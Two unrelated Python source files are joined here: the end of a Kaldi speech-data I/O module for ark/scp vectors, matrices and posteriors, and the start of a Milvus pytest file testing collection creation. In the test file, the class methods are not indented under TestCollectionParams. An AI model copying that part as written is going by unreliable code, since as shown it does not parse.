        proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
        stream = proc.stdin
    else:
        # sanity,
        raise ValueError("invalid mode %s" % mode)
    threading.Thread(target=cleanup, args=(proc, cmd)).start()  # clean-up thread,
    return io.TextIOWrapper(stream) if text else stream
def read_key(fd):
    """ [key] = read_key(fd)
    Read the utterance-key from the opened ark/stream descriptor 'fd'.
    Returns None at end of file.
    """
    key = ''
    while True:
        char = fd.read(1).decode("latin1")
        if char == '':
            break  # end of stream,
        if char == ' ':
            break  # key/data separator,
        key += char
    key = key.strip()
    if key == '':
        return None  # end of file,
    # raw string fixes the invalid '\S' escape of the original (SyntaxWarning
    # on modern Python 3),
    assert re.match(r'^\S+$', key) is not None  # check format (no whitespace!)
    return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
    """ Alias to 'read_vec_int_ark()' (kaldi alignments are int vectors). """
    return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
    """ generator(key,vec) = read_vec_int_ark(file_or_fd)
    Yield (key, vector<int>) tuples read from an ark file/stream.
    file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
    Read ark to a 'dictionary':
    d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        while True:
            utt = read_key(fd)
            if not utt:
                break  # end of archive,
            yield utt, read_vec_int(fd)
    finally:
        if fd is not file_or_fd:
            fd.close()
def read_vec_int(file_or_fd):
    """ [int-vec] = read_vec_int(file_or_fd)
    Read a kaldi integer vector (ascii or binary input).
    """
    fd = open_or_fd(file_or_fd)
    flag = fd.read(2).decode()
    if flag == '\0B':  # binary flag
        assert(fd.read(1).decode() == '\4')  # int-size
        dim = np.frombuffer(fd.read(4), dtype='int32', count=1)[0]  # vector dim
        # Each element is stored as a (sizeof(int32), value) pair -> 5 bytes,
        pairs = np.frombuffer(fd.read(dim * 5), dtype=[('size', 'int8'), ('value', 'int32')], count=dim)
        assert(pairs[0]['size'] == 4)  # int32 size,
        ans = pairs[:]['value']  # values are in 2nd column,
    else:  # ascii,
        tokens = (flag + fd.readline().decode()).strip().split()
        try:
            tokens.remove('['); tokens.remove(']')  # optionally
        except ValueError:
            pass
        ans = np.array(tokens, dtype=int)
    if fd is not file_or_fd:
        fd.close()  # cleanup
    return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
    """ write_vec_int(f, v, key='')
    Write a binary kaldi integer vector to a filename or stream.

    Arguments:
    file_or_fd : filename or opened file descriptor for writing,
    v : the vector to be stored,
    key (optional) : utterance-id written before the vector (ark files).
    """
    fd = open_or_fd(file_or_fd, mode='wb')
    if sys.version_info[0] == 3:
        assert(fd.mode == 'wb')
    try:
        if key != '':
            fd.write((key + ' ').encode("latin1"))  # ark-files have keys (utterance-id),
        fd.write('\0B'.encode())  # binary marker,
        # dimension, stored as (int32-size byte, int32 value),
        fd.write('\4'.encode())
        fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
        # elements, each stored as (int32-size byte, int32 value),
        for value in v:
            fd.write('\4'.encode())
            fd.write(struct.pack(np.dtype('int32').char, value))
    finally:
        if fd is not file_or_fd:
            fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
    """ generator(key,mat) = read_vec_flt_scp(file_or_fd)
    Returns generator of (key,vector) tuples, read according to kaldi scp.
    file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
    Iterate the scp:
    for key,vec in kaldi_io.read_vec_flt_scp(file):
        ...
    Read scp to a 'dictionary':
    d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        for line in fd:
            # Strip the trailing newline: otherwise plain rxfilenames
            # (no ':offset' suffix) keep '\n' and fail to open.
            (key, rxfile) = line.decode().rstrip('\n').split(' ')
            vec = read_vec_flt(rxfile)
            yield key, vec
    finally:
        if fd is not file_or_fd:
            fd.close()
def read_vec_flt_ark(file_or_fd):
    """ generator(key,vec) = read_vec_flt_ark(file_or_fd)
    Yield (key, vector<float>) tuples read from an ark file/stream.
    file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
    Read ark to a 'dictionary':
    d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        while True:
            utt = read_key(fd)
            if not utt:
                break  # end of archive,
            yield utt, read_vec_flt(fd)
    finally:
        if fd is not file_or_fd:
            fd.close()
def read_vec_flt(file_or_fd):
    """ [flt-vec] = read_vec_flt(file_or_fd)
    Read kaldi float vector, ascii or binary input.

    Fix: the cleanup now runs on the binary path too -- the original
    returned before closing, leaking descriptors opened from filenames.
    """
    fd = open_or_fd(file_or_fd)
    try:
        binary = fd.read(2).decode()
        if binary == '\0B':  # binary flag
            return _read_vec_flt_binary(fd)
        # ascii,
        arr = (binary + fd.readline().decode()).strip().split()
        try:
            arr.remove('['); arr.remove(']')  # optionally
        except ValueError:
            pass
        return np.array(arr, dtype=float)
    finally:
        if fd is not file_or_fd:
            fd.close()  # cleanup
def _read_vec_flt_binary(fd):
    """Read a binary kaldi float vector body (after the '\\0B' flag):
    a 3-char precision header ('FV '/'DV '), the int32 dimension, then the
    raw payload."""
    header = fd.read(3).decode()
    if header == 'FV ':
        sample_size = 4  # floats
    elif header == 'DV ':
        sample_size = 8  # doubles
    else:
        raise UnknownVectorHeader("The header contained '%s'" % header)
    assert sample_size > 0
    # Dimension, stored as (int32-size byte, int32 value),
    assert fd.read(1).decode() == '\4'  # int-size
    vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0]  # vector dim
    # Read the whole vector payload in one go,
    buf = fd.read(vec_size * sample_size)
    if sample_size == 4:
        return np.frombuffer(buf, dtype='float32')
    elif sample_size == 8:
        return np.frombuffer(buf, dtype='float64')
    raise BadSampleSize
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
    """ write_vec_flt(f, v, key='')
    Write a binary kaldi vector (32-bit or 64-bit floats) to a filename or
    stream.

    Arguments:
    file_or_fd : filename or opened file descriptor for writing,
    v : the vector to be stored,
    key (optional) : utterance-id written before the vector (ark files).
    """
    fd = open_or_fd(file_or_fd, mode='wb')
    if sys.version_info[0] == 3:
        assert(fd.mode == 'wb')
    try:
        if key != '':
            fd.write((key + ' ').encode("latin1"))  # ark-files have keys (utterance-id),
        fd.write('\0B'.encode())  # binary marker,
        # precision header,
        header = {'float32': 'FV ', 'float64': 'DV '}.get(str(v.dtype))
        if header is None:
            raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
        fd.write(header.encode())
        # dimension,
        fd.write('\04'.encode())
        fd.write(struct.pack(np.dtype('uint32').char, v.shape[0]))  # dim
        # raw payload,
        fd.write(v.tobytes())
    finally:
        if fd is not file_or_fd:
            fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
    """ generator(key,mat) = read_mat_scp(file_or_fd)
    Returns generator of (key,matrix) tuples, read according to kaldi scp.
    file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
    Iterate the scp:
    for key,mat in kaldi_io.read_mat_scp(file):
        ...
    Read scp to a 'dictionary':
    d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        for line in fd:
            # Strip the trailing newline: otherwise plain rxfilenames
            # (no ':offset' suffix) keep '\n' and fail to open.
            (key, rxfile) = line.decode().rstrip('\n').split(' ')
            mat = read_mat(rxfile)
            yield key, mat
    finally:
        if fd is not file_or_fd:
            fd.close()
def read_mat_ark(file_or_fd):
    """ generator(key,mat) = read_mat_ark(file_or_fd)
    Yield (key, matrix) tuples read from an ark file/stream.
    file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
    Read ark to a 'dictionary':
    d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        while True:
            utt = read_key(fd)
            if not utt:
                break  # end of archive,
            yield utt, read_mat(fd)
    finally:
        if fd is not file_or_fd:
            fd.close()
def read_mat(file_or_fd):
    """ [mat] = read_mat(file_or_fd)
    Read a single kaldi matrix (ascii or binary).
    file_or_fd : file, gzipped file, pipe or opened file descriptor.
    """
    fd = open_or_fd(file_or_fd)
    try:
        flag = fd.read(2).decode()
        if flag == '\0B':
            mat = _read_mat_binary(fd)
        else:
            assert flag == ' ['  # ascii matrices start with ' [',
            mat = _read_mat_ascii(fd)
    finally:
        if fd is not file_or_fd:
            fd.close()
    return mat
def _read_mat_binary(fd):
    """Read a binary kaldi matrix body (after the '\\0B' flag): a 3-char
    type header, the int32 dimensions, then the raw payload."""
    header = fd.read(3).decode()
    # Compressed matrices start with 'CM' ('CM ', 'CM2', 'CM3'),
    if header.startswith('CM'):
        return _read_compressed_mat(fd, header)
    if header == 'FM ':
        sample_size = 4  # floats
    elif header == 'DM ':
        sample_size = 8  # doubles
    else:
        raise UnknownMatrixHeader("The header contained '%s'" % header)
    assert sample_size > 0
    # Dimensions packed as (int8 size, int32 rows, int8 size, int32 cols),
    s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
    # Read the whole matrix payload in one go,
    buf = fd.read(rows * cols * sample_size)
    dtype = 'float32' if sample_size == 4 else 'float64'
    return np.frombuffer(buf, dtype=dtype).reshape(rows, cols)
def _read_mat_ascii(fd):
    """Read an ascii kaldi matrix body: whitespace-separated rows, the
    final row terminated by ']'."""
    rows = []
    while True:
        line = fd.readline().decode()
        if len(line) == 0:
            raise BadInputFormat  # eof, should not happen!
        if len(line.strip()) == 0:
            continue  # skip empty line
        tokens = line.strip().split()
        if tokens[-1] == ']':
            rows.append(np.array(tokens[:-1], dtype='float32'))  # last line,
            return np.vstack(rows)
        rows.append(np.array(tokens, dtype='float32'))  # not last line,
def _read_compressed_mat(fd, format):
    """ Read a compressed matrix,
    see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
    methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
    """
    assert(format == 'CM ')  # The formats CM2, CM3 are not supported...
    # Format of header 'struct',
    global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')])  # member '.format' is not written,
    per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
    # Read global header,
    globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
    # The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
    #                         {           cols           }{     size         }
    # Per-column percentile headers: each uint16 is rescaled into the global
    # [globmin, globmin+globrange] range (1/65535 = 1.52590218966964e-05),
    col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
    col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
    # One uint8 per element, stored column-major,
    data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows))  # stored as col-major,

    mat = np.zeros((cols,rows), dtype='float32')
    # Per-column percentile anchors (p0 <= p25 <= p75 <= p100),
    p0 = col_headers[:, 0].reshape(-1, 1)
    p25 = col_headers[:, 1].reshape(-1, 1)
    p75 = col_headers[:, 2].reshape(-1, 1)
    p100 = col_headers[:, 3].reshape(-1, 1)
    # Codes 0..64, 65..192 and 193..255 interpolate piecewise-linearly
    # between the percentile anchors of their column,
    mask_0_64 = (data <= 64)
    mask_193_255 = (data > 192)
    mask_65_192 = (~(mask_0_64 | mask_193_255))

    mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
    mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
    mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)

    return mat.T  # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
    """ write_mat(f, m, key='')
    Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
    Arguments:
     file_or_fd : filename of opened file descriptor for writing,
     m : the matrix to be stored,
     key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
    Example of writing single matrix:
     kaldi_io.write_mat(filename, mat)
    Example of writing arkfile:
     with open(ark_file,'w') as f:
       for key,mat in dict.iteritems():
         kaldi_io.write_mat(f, mat, key=key)
    """
    fd = open_or_fd(file_or_fd, mode='wb')
    # On python3, make sure we really got a binary-mode descriptor,
    if sys.version_info[0] == 3: assert(fd.mode == 'wb')
    try:
        if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
        fd.write('\0B'.encode()) # we write binary!
        # Data-type tag, selected by matrix dtype,
        tag = {'float32': 'FM ', 'float64': 'DM '}.get(str(m.dtype))
        if tag is None:
            raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
        fd.write(tag.encode())
        # Dimensions, each encoded as '\4' marker + uint32,
        fd.write('\04'.encode())
        fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
        fd.write('\04'.encode())
        fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
        # Raw matrix data (row-major),
        fd.write(m.tobytes())
    finally:
        if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
    """ Alias of 'read_post_ark()': a confusion network ('cnet') is stored
    as a kaldi 'Posterior', so the same reader applies. """
    return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
    """ generator(key,vec<vec<int,float>>) = read_post_ark(file)
    Returns generator of (key,posterior) tuples, read from ark file.
    file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
    Iterate the ark:
     for key,post in kaldi_io.read_post_ark(file):
       ...
    Read ark to a 'dictionary':
     d = { key:post for key,post in kaldi_io.read_post_ark(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        # Keep reading (key, posterior) records until there are no more keys,
        while True:
            key = read_key(fd)
            if not key:
                break
            yield key, read_post(fd)
    finally:
        # Only close descriptors we opened ourselves,
        if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
    """ [post] = read_post(file_or_fd)
    Reads single kaldi 'Posterior' in binary format.
    The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
    the outer-vector is usually time axis, inner-vector are the records
    at given time, and the tuple is composed of an 'index' (integer)
    and a 'float-value'. The 'float-value' can represent a probability
    or any other numeric value.
    Returns vector of vectors of tuples.
    """
    fd = open_or_fd(file_or_fd)
    # FIX: close the descriptor via try/finally so it is not leaked when an
    # assert fails or a read is short -- consistent with the other readers here.
    try:
        ans=[]
        binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
        assert(fd.read(1).decode() == '\4'); # int-size
        outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
        # Loop over 'outer-vector',
        for i in range(outer_vec_size):
            assert(fd.read(1).decode() == '\4'); # int-size
            inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
            # Each record is: int8 size-marker, int32 index, int8 size-marker, float32 value (10 bytes),
            data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
            assert(data[0]['size_idx'] == 4)
            assert(data[0]['size_post'] == 4)
            ans.append(data[['idx','post']].tolist())
    finally:
        if fd is not file_or_fd: fd.close()
    return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
    """ generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
    Returns generator of (key,cntime) tuples, read from ark file.
    file_or_fd : file, gzipped file, pipe or opened file descriptor.
    Iterate the ark:
     for key,time in kaldi_io.read_cntime_ark(file):
       ...
    Read ark to a 'dictionary':
     d = { key:time for key,time in kaldi_io.read_post_ark(file) }
    """
    fd = open_or_fd(file_or_fd)
    try:
        # Keep reading (key, cn-time) records until there are no more keys,
        while True:
            key = read_key(fd)
            if not key:
                break
            yield key, read_cntime(fd)
    finally:
        # Only close descriptors we opened ourselves,
        if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
    """ [cntime] = read_cntime(file_or_fd)
    Reads single kaldi 'Confusion Network time info', in binary format:
    C++ type: vector<tuple<float,float> >.
    (begin/end times of bins at the confusion network).
    Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
    file_or_fd : file, gzipped file, pipe or opened file descriptor.
    Returns vector of tuples.
    """
    fd = open_or_fd(file_or_fd)
    # FIX: close the descriptor via try/finally so it is not leaked when an
    # assert fails or a read is short -- consistent with the other readers here.
    try:
        binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
        assert(fd.read(1).decode() == '\4'); # int-size
        vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
        # Each record is: int8 size-marker, float32 t_beg, int8 size-marker, float32 t_end (10 bytes),
        data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
        assert(data[0]['size_beg'] == 4)
        assert(data[0]['size_end'] == 4)
        ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
    finally:
        if fd is not file_or_fd : fd.close()
    return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
    """ [ bool_vec ] = read_segments_as_bool_vec(segments_file)
    using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
    - t-beg, t-end is in seconds,
    - assumed 100 frames/second,
    """
    # Each row: (utt, rec, t_beg, t_end); ndmin=1 keeps a 1-row file iterable,
    segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
    # Sanity checks,
    assert(len(segs) > 0) # empty segmentation is an error,
    assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
    # Convert time to frame-indexes (rounded to nearest frame at 100 fps),
    start = np.rint([100 * rec[2] for rec in segs]).astype(int)
    end = np.rint([100 * rec[3] for rec in segs]).astype(int)
    # Taken from 'read_lab_to_bool_vec', htk.py,
    # Run-length expansion: the value pattern is [False,True,False,True,...,False]
    # and the repeat counts are [gap-before-seg1, len-seg1, gap, len-seg2, ..., 0],
    # where each gap is start[i] - end[i-1] (0 before the first segment).
    # NOTE(review): assumes segments are sorted and non-overlapping, otherwise a
    # gap count would be negative -- confirm with callers.
    frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
                     np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
    # Total True frames must equal the summed segment lengths,
    assert np.sum(end-start) == np.sum(frms)
    return frms
|
test_collection.py | from functools import reduce
import numpy
import pandas as pd
import pytest
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.util_pymilvus import *
from utils.util_log import test_log as log
# Name-prefix and expected-property dict keys shared by the test cases below.
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
# Default schemas used when a test does not build its own.
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
# Legacy per-operation uid markers.
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
# Default single-vector search request (L2 metric, nprobe=10).
default_single_query = {
    "data": gen_vectors(1, default_dim),
    "anns_field": default_float_vec_field_name,
    "param": {"metric_type": "L2", "params": {"nprobe": 10}},
    "limit": default_top_k,
}
# Default index parameters for float and binary vector fields.
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
default_nq = ct.default_nq
default_search_exp = "int64 >= 0"
default_limit = ct.default_limit
# Random query vectors reused across search tests.
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
default_search_field = ct.default_float_vec_field_name
default_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
    # Yields every invalid value except None, which is a valid (defaulted) schema.
    if request.param is None:
        pytest.skip("None schema is valid")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
    # Yields every invalid value except lists, since a list is the valid fields type.
    if isinstance(request.param, list):
        pytest.skip("list is valid fields")
    yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
    # Yields a field of every dtype except INT64, the only supported primary key type here.
    if request.param.dtype == DataType.INT64:
        pytest.skip("int64 type is valid primary key")
    yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
    # Yields every invalid value except 1, which is a valid dimension.
    if request.param == 1:
        pytest.skip("1 is valid dim")
    yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
    """
    target: test collection with default schema
    method: create collection with default schema
    expected: assert collection property
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    self.collection_wrap.init_collection(c_name, schema=default_schema,
                                         check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
                                                      exp_primary: ct.default_int64_field_name})
    # The new collection must also show up in the server-side listing,
    assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_name(self):
    """
    target: test collection with empty name
    method: create collection with an empty name
    expected: raise exception
    """
    self._connect()
    c_name = ""
    # FIX: dropped the extraneous f-prefix (no placeholders, ruff F541);
    # the runtime string is unchanged.
    error = {ct.err_code: -1, ct.err_msg: '`collection_name` value is illegal'}
    self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
                                         check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
    """
    target: test collection with illegal name
    method: create collection with illegal name
    expected: raise exception
    """
    self._connect()
    # Non-string names are rejected client-side before any RPC,
    error = {ct.err_code: -1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
    self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
                                         check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
    """
    target: test collection with invalid name
    method: create collection with invalid name
    expected: raise exception
    """
    self._connect()
    # Strings violating the naming rules (leading digit, spaces, symbols, over-long),
    error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
    self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
                                         check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
    """
    target: test collection with dup name
    method: create collection with dup name and none schema and data
    expected: collection properties consistent
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: default_schema})
    # Re-initializing with the same name attaches to the existing collection,
    self.collection_wrap.init_collection(collection_w.name)
    assert collection_w.name == self.collection_wrap.name
    assert collection_w.schema == self.collection_wrap.schema
    assert collection_w.num_entities == self.collection_wrap.num_entities
    assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_with_desc(self):
    """
    target: test collection with dup name
    method: 1. default schema with desc 2. dup name collection
    expected: desc consistent
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    schema = cf.gen_default_collection_schema(description=ct.collection_desc)
    collection_w = self.init_collection_wrap(name=c_name, schema=schema,
                                             check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: schema})
    # Second handle to the same name must report the same schema/description,
    self.collection_wrap.init_collection(c_name,
                                         check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: schema})
    assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
    """
    target: test collection with dup name and new schema
    method: 1.create collection with default schema
            2. collection with dup name and new schema
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                              check_items={exp_name: c_name, exp_schema: default_schema})
    # A schema with a different field set must be rejected for the same name,
    fields = [cf.gen_int64_field(is_primary=True)]
    schema = cf.gen_collection_schema(fields=fields)
    error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
                                         "schema passed in."}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_new_primary(self):
    """
    target: test collection with dup name and new primary_field schema
    method: 1.collection with default schema
            2. collection with same fields and new primary_field schema
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    int_field_one = cf.gen_int64_field()
    int_field_two = cf.gen_int64_field(name="int2")
    fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
    schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
    collection_w = self.init_collection_wrap(name=c_name, schema=schema,
                                             check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: schema,
                                                          exp_primary: int_field_one.name})
    # Same fields but a different primary key is still a schema mismatch,
    new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
    error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
                                         "schema passed in."}
    self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
                                         check_items=error)
    # The original primary field must be unchanged,
    assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
    """
    target: test collection with dup name and new dim schema
    method: 1. default schema 2. schema with new dim
    expected: raise exception
    """
    self._connect()
    new_dim = 120
    c_name = cf.gen_unique_str(prefix)
    collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: default_schema})
    # Swap the vector field for one with a different dimension,
    schema = cf.gen_default_collection_schema()
    new_fields = cf.gen_float_vec_field(dim=new_dim)
    schema.fields[-1] = new_fields
    error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
                                         "schema passed in."}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
    # The original dimension must be unchanged,
    dim = collection_w.schema.fields[-1].params['dim']
    assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
    """
    target: test collection with dup name and invalid schema
    method: 1. default schema 2. invalid schema
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: default_schema})
    # Any non-CollectionSchema value must be rejected, even for an existing name,
    error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
    schema = get_none_removed_invalid_strings
    self.collection_wrap.init_collection(collection_w.name, schema=schema,
                                         check_task=CheckTasks.err_res, check_items=error)
    # The existing collection is untouched,
    assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
    """
    target: test collection with dup name and same schema
    method: dup name and same schema
    expected: two collection object is available
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
                                             check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: default_schema})
    # Matching schema: second init succeeds and refers to the same collection,
    self.collection_wrap.init_collection(name=c_name, schema=default_schema,
                                         check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: default_schema})
    assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_schema(self):
    """
    target: test collection with none schema
    method: create collection with none schema
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # A brand-new name with schema=None cannot be created,
    error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
    self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
    """
    target: test collection with invalid schema
    method: create collection with non-CollectionSchema type schema
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
